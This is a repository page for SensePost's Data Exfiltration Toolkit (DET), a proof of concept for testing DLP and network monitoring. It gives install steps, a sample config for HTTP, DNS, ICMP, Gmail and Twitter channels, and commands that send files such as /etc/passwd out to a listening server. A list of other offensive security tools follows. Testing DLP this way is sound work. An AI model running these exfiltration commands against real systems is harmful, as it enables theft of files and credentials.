• Stars
    star
    810
  • Rank 54,255 (Top 2 %)
  • Language
    Python
  • License
    MIT License
  • Created about 8 years ago
  • Updated over 6 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

(extensible) Data Exfiltration Toolkit (DET)

DET (extensible) Data Exfiltration Toolkit

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.

This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)

The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.

The primary repository has now moved to here.

Slides

DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.

Example usage (ICMP plugin)

Server-side:

asciicast

Client-side:

asciicast

Usage while combining two channels (Gmail/Twitter)

Server-side:

asciicast

Client-side:

asciicast

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

Configuration

In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json

{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Usage

Help usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules

So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other "services":

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules

So far, I am busy implementing new modules which are almost ready to ship, including:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Roadmap

References

Some pretty cool references/credits to people I got inspired by with their project:

Contact/Contributing

You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.

License

DET is licensed under a MIT License. Permissions beyond the scope of this license may be available at [email protected]

More Repositories

1

objection

πŸ“± objection - runtime mobile exploration
Python
7,007
star
2

reGeorg

The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Python
2,935
star
3

gowitness

πŸ” gowitness - a golang, web screenshot utility using Chrome Headless
Go
2,701
star
4

ruler

A tool to abuse Exchange services
Go
2,082
star
5

mana

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM
HTML
1,079
star
6

godoh

πŸ•³ godoh - A DNS-over-HTTPS C2
Go
735
star
7

kwetza

Python script to inject existing Android applications with a Meterpreter payload.
Smali
623
star
8

Snoopy

Snoopy: A distributed tracking and data interception framework
Python
596
star
9

hostapd-mana

SensePost's modified hostapd for wifi attacks.
C
520
star
10

rattler

Automated DLL Enumerator
C++
516
star
11

DNS-Shell

DNS-Shell is an interactive Shell over DNS channel
Python
516
star
12

USaBUSe

Universal Serial aBUSe is a project to demonstrate the risks of hardware bypasses of software security by Rogan Dawes at SensePost.
C
481
star
13

snoopy-ng

Snoopy v2.0 - modular digital terrestrial tracking framework
Python
428
star
14

reDuh

Create a TCP circuit through validly formed HTTP requests
Java
343
star
15

autoDANE

Auto Domain Admin and Network Exploitation.
Python
295
star
16

Frack

Frack - Keep and Maintain your breach data
Python
279
star
17

SPartan

Frontpage and Sharepoint fingerprinting and attack tool.
Python
275
star
18

wiresocks

A sock, with a wire, so you can tunnel all you desire.
Shell
264
star
19

impersonate

A windows token impersonation tool
Python
257
star
20

mallet

Mallet is an intercepting proxy for arbitrary protocols
Java
250
star
21

UserEnum

Domain user enumeration tool
Python
211
star
22

jack

Drag and Drop ClickJacking PoC development assistance tool.
CSS
189
star
23

wpa_sycophant

Evil client portion of EAP relay attack
C
179
star
24

wikto

Nikto for Windows with some extra features.
C#
172
star
25

routopsy

Routopsy - Hacking Routers with Routers
Python
165
star
26

heartbleed-poc

Test for SSL heartbeat vulnerability (CVE-2014-0160)
Ruby
158
star
27

dwn

d(ockerp)wn - a docker pwn tool manager
Python
158
star
28

gdi-palettes-exp

DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects
C++
143
star
29

wadi

Wadi Fuzzing Harness
JavaScript
127
star
30

birp

Big Iron Recon & Pwnage
Python
118
star
31

assless-chaps

Crack MSCHAPv2 challenge/responses quickly using a database of NT hashes
Python
117
star
32

liniaal

Liniaal - A communication extension to Ruler
Go
99
star
33

frida-windows-playground

A collection of Frida hooks for experimentation on Windows platforms.
C
93
star
34

ms16-098

Windows 8.1 x64 Exploit for MS16-098 RNGOBJ_Integer_Overflow
C
93
star
35

notruler

The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.
Go
89
star
36

mydumbedr

C
84
star
37

go-out

β˜„οΈ go-out - A Golang egress buster.
Go
82
star
38

offensive-rpc

Offensive RPC PoC
C++
81
star
39

anapickle

Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.
Python
80
star
40

autoresponder

Quick python script to automatically load NTLM hashes from Responder logs and fires up Hashcat to crack them
Python
78
star
41

mail-in-the-middle

Python
78
star
42

xrdp

A rudimentary remote desktop tool for the X11 protocol exploiting unauthenticated x11 sessions
Python
77
star
43

peanuts

Peanuts is a free and open source wifi tracking tool. Based on the SensePosts Snoopy-NG project that is now closed.
Python
70
star
44

apostille

Java
69
star
45

WiFi-Rifle

Creating a wireless rifle de-authentication gun, which utilized a yagi antenna and a Raspberry Pi.
Python
65
star
46

common-substr

Simple tool to extract the most common substrings from an input text. Built for password cracking.
Go
62
star
47

shinai-fi

Docker images for learning wifi hacking
Shell
61
star
48

hash-cracker

Script to perform some hashcracking logic automagically
C
59
star
49

punch-q

πŸ‘Š A small utility to play with IBM MQ
Python
58
star
50

thumbscr-ews

Exchangelib wrapper for pentesting
Python
53
star
51

BiLE-suite

The Bi-directional Link Extractor.
Perl
53
star
52

wsproxy

A websocket proxy
JavaScript
53
star
53

go-derper

Memcache hacking tool.
Ruby
48
star
54

yeti

SensePost's network footprinting and enumeration tool. You can't pwn what you don't know about.
Java
42
star
55

understanding-eap

A repository with toy implementations of MSCHAPv2, MPEE and WPA/2 to understand EAP better
Python
36
star
56

sockstlsproxy

C#
35
star
57

ntcrack

Left To My Own Devices - NT hash tools
Rust
32
star
58

policies

Collection of information security policies.
28
star
59

Suru

Suru is one of the original Man In The Middle (MITM) proxies that sits between the user's browser and the web application.
C#
27
star
60

dual-pod-shock

C
26
star
61

squeeza

SQL Injection without the pain of syringes.
Ruby
25
star
62

steampipe-plugin-projectdiscovery

A steampipe plugin to query projectdiscovery.io tools.
Go
25
star
63

wpa3-vuln

hostapd and wpa_supplicant 2.7 vulnerable to Mathy's WPA3 bugs
C
23
star
64

x11-active-displays

Checks X11 and outputs a screenshot to of the display if allowed and the display is active
Lua
23
star
65

SapCap

SApCap is a SAP packet sniffer and decompression tool for analysing SAP GUI (DIAG) traffic
C++
17
star
66

6thSense

A while back antirez, in a post to Bugtraq, detailed a new Tcp portscan method.
Perl
17
star
67

password-tools

Service desk password tools.
JavaScript
16
star
68

maltego-mvs

Tools to combine MVS data with external sources and visualise the output in Maltego.
Python
16
star
69

ntp_monlist

Basic script to pull addresses from a NTP server using the monlist command.
Python
15
star
70

XAPSpy

Runtime analysis of windows phone 7 applications.
C#
14
star
71

cipherchecks

visually see issues with supported cipher suites
Python
13
star
72

esp-vnc

Our fork of the esp-link firmware with a built in VNC server for passing input events to an AVR. Part of our Universal Serial aBUSe project.
C
12
star
73

SAPProx

SAPProx is a proof of concept tool for intercepting and modifying SAP GUI (DIAG protocol) traffic.
C++
12
star
74

JBaah

HTTP Brute Forcer (Java replacement for SP's CrowBar).
Java
12
star
75

SP-DNS-mine

Google DNS name / sub domain miner.
Perl
11
star
76

casper

Casper is a tiny system tray application that can be used to view the invisible windows on your desktop.
C#
11
star
77

SpUD

SensePost Unified Data API (SPUD) is a wrapper for apps requiring use of the deprecated Google API.
C#
11
star
78

neverevercookie

GUI for cleaning out evercookie persistence locations.
Java
10
star
79

dresscode

Python
10
star
80

berate_radius

Alpine hostapd-mana based RADIUS server
Shell
9
star
81

Manifestor

Android Manifest.xml tool
Python
9
star
82

glypeahead

Port scan through Glype proxies.
PHP
9
star
83

ClashofSpamTitan

Python
9
star
84

BilePublic

BiLE stands for Bi-directional Link Extraction. It is used in the footprinting process to find non-obvious relationships between different web sites.
Perl
9
star
85

jcertchecker

JCertChecker is used to check HTTPS certificates.
Java
8
star
86

Scully

Scully is a client interface to MSSQL and MySQL database servers.
C#
8
star
87

finder

Finder.pl remotely checks IIS Servers for most of the methods used by WebDAV.
Perl
8
star
88

desperate

Perl
7
star
89

CarbanakCheck

Check squid logs for possible Carbanak malware.
Python
7
star
90

MonSoen

Proxy Server network scanner and tunnelling tool.
Python
7
star
91

hash-cracker-apple-silicon

Script to perform some hashcracking logic automagically
Python
6
star
92

sconwar

a bring your own client programming game
Go
6
star
93

go

Seriously primitive portscanner using Squid proxy.
Perl
6
star
94

pudding

IDS evasion for web-based exploits via encoding built into a "proxy"
6
star
95

gr-protocoldecoder

A simple way to decode a known protocol in GRC in real time.
CMake
5
star
96

unitools

For working with IIS servers with the Unicode bug
Perl
5
star
97

file-read-experiments

A few short scripts to look at the performance of various file read strategies.
Rust
5
star
98

mpdchecker

Confirm the presence of HTTP methods per directory.
Python
4
star
99

sensedecode

Sensedecode includes 2 perl scripts which exploit the IIS url decoding bug.
Perl
4
star
100

sensecon-2021-discord-bot

Discord Bot used for the SenseCon 2021 Challenges: https://sensepost.com/blog/2021/sensecon-2021-wargames-edition/
TypeScript
4
star